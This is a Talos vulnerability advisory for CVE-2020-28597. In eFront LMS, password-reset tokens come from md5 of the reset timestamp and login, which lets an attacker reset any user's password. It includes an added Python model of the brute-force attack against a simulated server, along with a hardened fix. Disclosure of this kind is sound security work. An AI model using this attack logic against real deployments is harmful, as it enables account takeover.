Talos Vulnerability Report

TALOS-2020-1221

Epignosis eFront LMS Password Reset authentication bypass vulnerability

March 3, 2021
CVE Number

CVE-2020-28597

Summary

A predictable seed vulnerability exists in the password reset functionality of Epignosis eFront LMS 5.2.21. By predicting the seed it is possible to generate the correct one-time password reset token. An attacker can then visit the password reset page with that token to reset the password of an account of their choice.

Tested Versions

Epignosis eFront LMS 5.2.17
Epignosis eFront LMS 5.2.21

Product URLs

None

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-337 - Predictable Seed in Pseudo-Random Number Generator (PRNG)

Details

The password reset functionality can be accessed at:

http[s]://[DOMAIN]/start/op/password_change/user/[USER_ID]/code/[HASH]

The hash is derived directly from the system time and the login name (which may be the user's e-mail address). An attacker can trigger the password reset function for a known user, which makes the server update that user's "reset_password_timestamp" to a value the attacker knows to within a small error margin. Knowing the timestamp and the login of the target, the attacker can calculate the hash and reset the account's password. The only remaining unknown is the numeric user_id, but these are assigned sequentially starting at 0, so it can be brute forced. There does not appear to be any lockout on this function, so a brute force is feasible, and the function also allows ID enumeration, so the user_id keyspace can be verified before starting.

The token that the server compares against the value submitted by the attacker is generated by the expression below, and the "reset_password_timestamp" it uses can be set by the attacker through the normal password reset functionality:

md5($this->reset_password_timestamp.$this->login);
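The following Python example is added here to illustrate the attack described above; it is not eFront's code and not the vendor's fix. It models the vulnerable token as md5(reset_password_timestamp . login) exactly as quoted in the report, and it ASSUMES that the timestamp is a Unix epoch integer (the report does not state its exact format) and that user IDs are sequential from 0. The VulnerableResetServer and HardenedResetServer classes, the attack() helper and the sample users are constructed stand-ins for the real endpoint.

```python
import hashlib
import hmac
import secrets
from typing import Callable, Dict, Optional, Tuple

# Constructed example, not eFront's code. Token = md5(reset_password_timestamp . login)
# as quoted in the report. ASSUMPTION: the timestamp is a Unix epoch integer.


def predictable_token(reset_timestamp: int, login: str) -> str:
    """Reproduce the vulnerable token: md5(timestamp . login), hex-encoded."""
    return hashlib.md5(f"{reset_timestamp}{login}".encode()).hexdigest()


class VulnerableResetServer:
    """Stand-in for the vulnerable password-reset endpoint (hypothetical model)."""

    def __init__(self, users: Dict[int, str], clock: Callable[[], int]):
        self.users = users                  # user_id -> login (may be an e-mail address)
        self.clock = clock                  # server time source
        self.reset_ts: Dict[int, int] = {}  # user_id -> reset_password_timestamp

    def request_reset(self, login: str) -> bool:
        """The public 'forgot password' form: anyone can trigger it for a known login."""
        for uid, known_login in self.users.items():
            if known_login == login:
                self.reset_ts[uid] = self.clock()
                return True
        return False

    def password_change(self, uid: int, code: str) -> bool:
        """Models /start/op/password_change/user/<uid>/code/<code>: no lockout, no rate limit."""
        if uid not in self.reset_ts:
            return False
        return code == predictable_token(self.reset_ts[uid], self.users[uid])


def attack(server: VulnerableResetServer, login: str, observed_ts: int,
           max_uid: int, margin: int = 5) -> Optional[Tuple[int, int, str]]:
    """Trigger a reset for the victim's login, then try every (user_id, timestamp)
    pair within +/- margin seconds of the attacker's own clock reading."""
    if not server.request_reset(login):
        return None
    for uid in range(0, max_uid + 1):
        for ts in range(observed_ts - margin, observed_ts + margin + 1):
            token = predictable_token(ts, login)
            if server.password_change(uid, token):
                return uid, ts, token
    return None


class HardenedResetServer:
    """Hardened alternative (added here; not the vendor's actual fix): an unguessable
    random token stored server-side and compared in constant time."""

    def __init__(self, users: Dict[int, str]):
        self.users = users
        self.tokens: Dict[int, str] = {}

    def request_reset(self, login: str) -> Optional[str]:
        for uid, known_login in self.users.items():
            if known_login == login:
                self.tokens[uid] = secrets.token_urlsafe(32)
                return self.tokens[uid]  # in reality sent only to the user's e-mail
        return None

    def password_change(self, uid: int, code: str) -> bool:
        stored = self.tokens.get(uid)
        return stored is not None and hmac.compare_digest(stored, code)


def demo() -> Optional[Tuple[int, int, str]]:
    """Constructed sample data: server clock frozen at one epoch second, attacker's
    clock reads two seconds later, victim's numeric user_id unknown (searched 0..10)."""
    users = {0: "admin@example.com", 1: "alice@example.com", 3: "victim@example.com"}
    server = VulnerableResetServer(users, clock=lambda: 1600000000)
    return attack(server, "victim@example.com", observed_ts=1600000002, max_uid=10)


if __name__ == "__main__":
    print(demo())
```

With the modelled margin of five seconds and eleven candidate user IDs, the brute force needs at most 121 requests; against a real deployment the timestamp window would be set from the attacker's measured round-trip time and the user_id range from the enumeration behaviour the report notes. The hardened server shows the two properties the original token lacks: the token carries no information the attacker can derive, and verification does not leak through timing.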

Timeline

2020-12-21 - Vendor Disclosure
2021-02-02 - Vendor Patched
2021-03-03 - Public Release

Credit

Discovered by Richard Dean, Cisco CX Security Advisory EMEAR